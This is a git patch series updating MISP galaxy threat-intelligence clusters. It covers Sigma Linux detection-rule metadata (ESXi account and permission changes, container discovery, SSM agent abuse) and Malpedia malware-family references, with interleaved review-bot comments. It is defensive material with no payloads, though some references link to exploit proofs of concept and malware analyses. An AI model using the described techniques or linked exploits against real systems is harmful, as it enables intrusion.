+ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker",
+ "https://blog.skyplabs.net/posts/container-detection/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1082"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "11701de9-d5a5-44aa-8238-84252f131895",
+ "value": "Docker Container Discovery Via Dockerenv Listing"
+ },
+ {
+ "description": "Detects user account creation on ESXi system via esxcli",
+ "meta": {
+ "author": "Cedric Maurugeon",
+ "creation_date": "2023/08/22",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_user_account_creation.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1136"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db",
+ "value": "ESXi Account Creation Via ESXCLI"
+ },
 {
 "description": "Detects common command used to enable bpf kprobes tracing",
 "meta": {
@@ -94765,9 +97769,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
 "https://bpftrace.org/",
 "https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html",
+ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml"
 ],
 "tags": [
@@ -94824,9 +97828,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan",
- "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/",
 "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/",
+ "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/",
+ "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml"
 ],
 "tags": [
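Review bot: Typo in the description of the new "Docker Container Discovery Via Dockerenv Listing" entry: `which can be a sing of potential container discovery` should read `which can be a sign of potential container discovery`. Both new entries in this hunk otherwise follow the same shape as their siblings (meta, tags, related, uuid, value), so no structural change is needed.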
@@ -94847,6 +97851,64 @@
 "uuid": "f9b3edc5-3322-4fc7-8aa3-245d646cc4b7",
 "value": "Potential Linux Amazon SSM Agent Hijacking"
 },
+ {
+ "description": "Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/09/04",
+ "falsepositive": [
+ "Legitimate administration activities"
+ ],
+ "filename": "proc_creation_lnx_esxcli_permission_change_admin.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml"
+ ],
+ "tags": [
+ "attack.execution"
+ ]
+ },
+ "uuid": "9691f58d-92c1-4416-8bf3-2edd753ec9cf",
+ "value": "ESXi Admin Permission Assigned To Account Via ESXCLI"
+ },
+ {
+ "description": "Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem",
+ "meta": {
+ "author": "Seth Hanford",
+ "creation_date": "2023/08/23",
+ "falsepositive": [
+ "Legitimate system administrator usage of these commands",
+ "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered"
+ ],
+ "filename": "proc_creation_lnx_susp_container_residence_discovery.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "linux",
+ "refs": [
+ "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker",
+ "https://blog.skyplabs.net/posts/container-detection/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1082"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "746c86fb-ccda-4816-8997-01386263acc4",
+ "value": "Container Residence Discovery Via Proc Virtual FS"
+ },
 {
 "description": "Detects execution of the \"mount\" command with \"hidepid\" parameter to make invisible processes to other users from the system",
 "meta": {
@@ -94860,9 +97922,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
+ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
 "https://blogs.blackberry.com/",
 "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/",
- "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml"
 ],
 "tags": [
@@ -94897,8 +97959,8 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml"
 ],
 "tags": [
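Review bot: The new "ESXi Admin Permission Assigned To Account Via ESXCLI" entry tags only the tactic `attack.execution` and, unlike every other esxcli entry added in this change, has no `related` array mapping it to an ATT&CK technique. With `"level": "high"` it is the most impactful rule of the set, so the gap is noticeable in a galaxy whose value comes from these mappings; granting an account admin permissions reads more naturally as an account-manipulation technique (T1098) than as Execution. If the tags are mirrored verbatim from the upstream rule, the correction should be proposed there as well so the next regeneration keeps it. The second entry in this hunk ("Container Residence Discovery Via Proc Virtual FS") is consistent with its siblings and needs no change.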
@@ -94931,8 +97993,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.makeuseof.com/how-to-install-and-use-doas/",
 "https://research.splunk.com/endpoint/linux_doas_tool_execution/",
+ "https://www.makeuseof.com/how-to-install-and-use-doas/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml"
 ],
 "tags": [
@@ -95065,8 +98127,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://attack.mitre.org/techniques/T1548/001/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md",
+ "https://attack.mitre.org/techniques/T1548/001/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml"
 ],
 "tags": [
@@ -95099,9 +98161,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
 "https://github.com/apache/spark/pull/36315/files",
 "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
+ "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml"
 ],
 "tags": [
@@ -95172,12 +98234,24 @@
 "refs": [
 "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html",
 "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection",
- "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/",
+ "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "312b42b1-bded-4441-8b58-163a3af58775",
 "value": "Potentially Suspicious Execution From Tmp Folder"
 },
@@ -95227,8 +98301,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "linux",
 "refs": [
- "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
 "https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/",
+ "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml"
 ],
 "tags": [
@@ -95306,5 +98380,5 @@
 "value": "Security Software Discovery - Linux"
 }
 ],
- "version": 20230823
+ "version": 20230924
 }

From a9a051ffaa874ce9c43ca5bd03ef49d04a7cab5a Mon Sep 17 00:00:00 2001
From: fl0x2208
Date: Tue, 26 Sep 2023 12:27:10 +1000
Subject: [PATCH 03/16] malpedia 2023 September update

malpedia 2023 September update
---
 clusters/malpedia.json | 26806 +++++++++++++++++++++------------
 1 file changed, 14666 insertions(+), 12140 deletions(-)

diff --git a/clusters/malpedia.json b/clusters/malpedia.json
index dc625e6..46f5e10 100644
--- a/clusters/malpedia.json
+++ b/clusters/malpedia.json
@@ -13,29 +13,29 @@
 "name": "Malpedia",
 "source": "Malpedia",
 "type": "malpedia",
- "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e",
+ "uuid": "1d1c9af9-37fa-4deb-a928-f9b0abc7354a",
 "values": [
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/aix.fastcash",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.us-cert.gov/ncas/alerts/TA18-275A",
- "https://www.youtube.com/watch?v=zGvQPtejX9w",
- "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
- "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
- "https://github.com/fboldewin/FastCashMalwareDissected/",
- "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf",
- "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A",
 "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
- "https://www.cisa.gov/uscert/ncas/alerts/TA18-275A"
+ "https://www.us-cert.gov/ncas/alerts/TA18-275A",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud.pdf",
+ "https://github.com/fboldewin/FastCashMalwareDissected/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa20-239a",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/fastcash-lazarus-atm-malware",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf",
+ "https://www.youtube.com/watch?v=zGvQPtejX9w",
+ "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/",
+ "https://i.blackhat.com/USA-20/Wednesday/us-20-Perlow-FASTCash-And-INJX_Pure-How-Threat-Actors-Use-Public-Standards-For-Financial-Fraud-wp.pdf",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg"
 ],
 "synonyms": [],
 "type": []
@@ -62,11 +62,11 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.aberebot",
 "https://blog.cyble.com/2022/03/10/aberebot-returns-as-escobar/",
- "https://twitter.com/_icebre4ker_/status/1460527428544176128",
 "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
 "https://hothardware.com/news/escobar-banking-trojan-targets-mfa-codes",
 "https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/",
- "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/"
+ "https://blog.cyble.com/2021/07/30/aberebot-on-the-rise-new-banking-trojan-targeting-users-through-phishing/",
+ "https://twitter.com/_icebre4ker_/status/1460527428544176128"
 ],
 "synonyms": [
 "Escobar"
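Review bot: The top-level `uuid` of the Malpedia cluster changes from `5fc98d08-90a4-498a-ad2e-0edf50ef374e` to `1d1c9af9-37fa-4deb-a928-f9b0abc7354a` while the patch touches only `clusters/malpedia.json`. Galaxy clusters are identified by this uuid, so consumers that already imported the previous one will presumably treat this as a new, unrelated cluster, and any galaxy definition still pointing at the old uuid will no longer match; if the change is deliberate it should be stated in the commit message and the referencing definition updated in the same change, otherwise the old uuid should be restored. Separately, most of the 26806 changed lines in this file are reorderings of existing `refs` entries (this hunk and the following ones), so emitting refs in a stable sorted order from the export would keep future updates reviewable.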
@@ -77,13 +77,13 @@
 "value": "Aberebot"
 },
 {
- "description": "",
+ "description": "According to PCrisk, AbstractEmu is the name of rooting malware that can gain privileged access to the Android operating system. Threat actors behind AbstractEmu are using legitimate-looking apps (like password managers, app launchers, data savers) to trick users into downloading and opening/executing this malware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.abstract_emu",
- "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
 "https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord"
+ "https://www.sentinelone.com/labs/the-art-and-science-of-macos-malware-hunting-with-radare2-leveraging-xrefs-yara-and-zignatures/"
 ],
 "synonyms": [],
 "type": []
@@ -96,8 +96,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.actionspy",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/",
 "https://www.trendmicro.com/en_us/research/20/f/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/",
 "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/"
 ],
 "synonyms": [
@@ -137,14 +137,27 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.agentsmith",
+ "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "34770e6e-e2c3-4e45-aa86-9d74b5309773",
+ "value": "Agent Smith"
+ },
+ {
+ "description": "According to PCrisk, Ahmyth is a Remote Access Trojan (RAT) targeting Android users. It is distributed via trojanized (fake) applications. Ahmyth RAT steals cryptocurrency and banking credentials, 2FA codes, lock screen passcodes, and captures screenshots.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ahmyth",
+ "https://www.secrss.com/articles/24995",
 "https://mp.weixin.qq.com/s/J_A12SOX0k5TOYFAegBv_w",
 "https://securelist.com/transparent-tribe-part-2/98233/",
- "https://www.secrss.com/articles/24995",
- "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
- "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/"
+ "https://www.welivesecurity.com/2019/08/22/first-spyware-android-ahmyth-google-play/",
+ "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset"
 ],
 "synonyms": [],
 "type": []
@@ -157,18 +170,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.alien",
- "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets",
- "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
- "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
- "https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing",
- "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
- "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/",
- "https://twitter.com/_CPResearch_/status/1603375823448317953",
 "https://www.prodaft.com/m/reports/BrunHilda_DaaS.pdf",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
+ "https://drive.google.com/file/d/1qd7Nqjhe2vyGZ5bGm6gVw0mM1D6YDolu/view?usp=sharing",
+ "https://www.threatfabric.com/blogs/alien_the_story_of_cerberus_demise.html",
+ "https://info.phishlabs.com/blog/alien-mobile-malware-evades-detection-increases-targets",
+ "https://research.checkpoint.com/2021/clast82-a-new-dropper-on-google-play-dropping-the-alienbot-banker-and-mrat/",
+ "https://preyproject.com/blog/en/cerberus-and-alien-the-malware-that-has-put-android-in-a-tight-spot/",
+ "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
+ "https://twitter.com/_CPResearch_/status/1603375823448317953",
+ "https://muha2xmad.github.io/malware-analysis/alien/",
+ "https://www.bleepingcomputer.com/news/security/google-predator-spyware-infected-android-devices-using-zero-days/",
 "https://resecurity.com/blog/article/in-the-box-mobile-malware-webinjects-marketplace",
- "https://muha2xmad.github.io/malware-analysis/alien/"
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/"
 ],
 "synonyms": [
 "AlienBot"
@@ -200,22 +213,23 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anatsa",
- "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
- "https://twitter.com/ThreatFabric/status/1394958795508523008",
- "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/",
- "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html",
- "https://twitter.com/_icebre4ker_/status/1416409813467156482",
- "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
- "https://gbhackers.com/teabot-banking-trojan/",
- "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe",
- "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
 "https://labs.k7computing.com/index.php/play-store-app-serves-teabot-via-github/",
- "https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html",
- "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf",
- "https://www.cleafy.com/documents/teabot",
- "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
 "https://www.buguroo.com/hubfs/website/pdf/reports/buguroo-malware-report-Toddler_EN.pdf",
- "https://labs.k7computing.com/?p=22407"
+ "https://www.threatfabric.com/blogs/anatsa-hits-uk-and-dach-with-new-campaign",
+ "https://www.telekom.com/en/blog/group/article/flubot-under-the-microscope-636368",
+ "https://twitter.com/_icebre4ker_/status/1416409813467156482",
+ "https://twitter.com/ThreatFabric/status/1394958795508523008",
+ "https://www.cleafy.com/documents/teabot",
+ "https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe",
+ "https://blog.nviso.eu/2021/05/11/android-overlay-attacks-on-belgian-financial-applications/",
+ "https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html",
+ "https://www.threatfabric.com/blogs/smishing-campaign-in-nl-spreading-cabassous-and-anatsa.html",
+ "https://thehackernews.com/2022/01/widespread-flubot-and-teabot-malware.html",
+ "https://gbhackers.com/teabot-banking-trojan/",
+ "https://labs.k7computing.com/?p=22407",
+ "https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered",
+ "https://labs.bitdefender.com/2021/06/threat-actors-use-mockups-of-popular-apps-to-spread-teabot-and-flubot-malware-on-android/",
+ "https://www.prodaft.com/m/reports/Toddler___TLPWHITE_V2.pdf"
 ],
 "synonyms": [
 "ReBot",
@@ -232,16 +246,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.androrat",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
 "https://github.com/DesignativeDave/androrat",
- "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset",
+ "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat",
 "https://www.stratosphereips.org/blog/2021/3/29/dissecting-a-rat-analysis-of-the-androrat",
 "https://hotforsecurity.bitdefender.com/blog/possibly-italy-born-android-rat-reported-in-china-find-bitdefender-researchers-16264.html",
- "https://www.stratosphereips.org/blog/2021/5/6/dissecting-a-rat-analysis-of-the-command-line-androrat",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/",
- "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg",
 "https://www.kaspersky.com/blog/mobile-malware-part-4/24290/",
- "https://mp.weixin.qq.com/s/AhxP5HmROtMsFBiUxj0cFg"
+ "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
+ "https://www.stratosphereips.org/blog/2020/11/10/android-mischief-rats-dataset"
 ],
 "synonyms": [],
 "type": []
@@ -254,34 +268,34 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/apk.anubis",
- "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html",
- "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html",
- "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
- "https://0x1c3n.tech/anubis-android-malware-analysis",
- "https://securelist.com/mobile-malware-evolution-2019/96280/",
- "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
- "https://pentest.blog/n-ways-to-unpack-mobile-malware/",
- "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
- "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
- "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/",
- "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
- "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html",
- "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
- "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb",
- "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
- "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
 "https://muha2xmad.github.io/malware-analysis/anubis/",
- "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
- "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
- "https://community.riskiq.com/article/85b3db8c",
- "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html",
- "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/",
 "https://www.youtube.com/watch?v=U0UsfO-0uJM",
+ "https://www.threatfabric.com/blogs/2020_year_of_the_rat.html",
+ "https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
+ "http://blog.koodous.com/2017/05/bankbot-on-google-play.html",
+ "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/ ",
+ "http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
+ "https://labs.bitdefender.com/2020/03/android-apps-and-malware-capitalize-on-coronavirus",
+ "https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
+ "https://www.fortinet.com/blog/threat-research/bankbot-the-prequel.html",
+ "http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
 "https://info.phishlabs.com/blog/new-variant-bankbot-banking-trojan-aubis",
- "https://assets.virustotal.com/reports/2021trends.pdf"
+ "https://www.threatfabric.com/blogs/the-rage-of-android-banking-trojans.html",
+ "https://community.riskiq.com/article/85b3db8c",
+ "https://sysopfb.github.io/malware,/reverse-engineering/2018/08/30/Unpacking-Anubis-APK.html",
+ "https://n1ght-w0lf.github.io/malware%20analysis/anubis-banking-malware/",
+ "https://securelist.com/mobile-malware-evolution-2019/96280/",
+ "https://www.fortinet.com/blog/threat-research/a-look-into-the-new-strain-of-bankbot.html",
+ "https://bushidotoken.blogspot.com/2020/05/turkey-targeted-by-cerberus-and-anubis.html",
+ "https://eybisi.run/Mobile-Malware-Analysis-Tricks-used-in-Anubis/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/google-play-apps-drop-anubis-banking-malware-use-motion-based-evasion-tactics/",
+ "https://0x1c3n.tech/anubis-android-malware-analysis",
+ "https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://securityboulevard.com/2018/09/android-malware-intercepts-sms-2fa-we-have-the-logs/",
+ "https://intel-honey.medium.com/reversing-anubis-malware-93f28d154bbb",
